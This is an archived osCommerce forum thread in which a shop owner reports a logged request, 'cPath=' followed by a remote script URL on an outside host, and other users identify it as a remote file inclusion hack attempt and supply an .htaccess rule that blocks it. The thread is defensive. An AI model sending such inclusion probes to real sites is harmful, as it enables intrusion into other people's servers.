Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Online Customers


katman1971

Recommended Posts

Hi

 

I just went in to Customers online and I have a much greater amount of visitors than normal. I noticed one strange visitor in particular and the url they are visiting is this, which is very strange:

index.php?cpath=http://www.soloencostarica.com/scripts/id.txt??? ?

 

My site is www.homelandart.ie but this is definitely not one 0f my urls. When you visit this url, you see my site though. Is someone trying something strange? Thanks

Link to comment
Share on other sites

Yes, that's a hack attempt. I've had the same problem. If your store is running osCommerce 2.2RC1 or later the attacks will not succeed. However they will eat up bandwidth and database connections, which could prevent legitimate customers from seeing your site. You can check by viewing random pages yourself. If you don't get any database errors you are probably fine. If you do see errors, or you want to block the hack, you will need to make a change to your .htaccess file.

 

To block the hacker, first make certain that your .htaccess has the following lines:

Options +FollowSymLinks
RewriteEngine on

If that code is not already there, add it to the bottom of the file. Then add the following after that:

# Block hackers trying a redirect in the URL
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC]
RewriteRule ^.* - [F]

 

Regards

Jim

See my profile for a list of my addons and ways to get support.

Link to comment
Share on other sites

Funny, there seems to be more and more of this. I used to see one of these hack attempts pop up in my "Who's Online" now and again, but lately I see them every few days, and there are three or four varieties. But breathe easy - they can't succeed unless you have a very old version of osC or you have installed mods that open up vulnerabilities.

 

~Wendy

Link to comment
Share on other sites

Dang hackers anyway!

:angry:

 

A very wise man once said, "The love of money is the root of all evil".

 

No matter where you call home or what religion you are (or aren't), you'd probably agree with that.

 

Dang hackers!

:angry:

 

May the fleas of 1,000 camels find their way into their beds!

 

May they mistake the hemorrhoid creme for toothpaste some groggy morning!

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...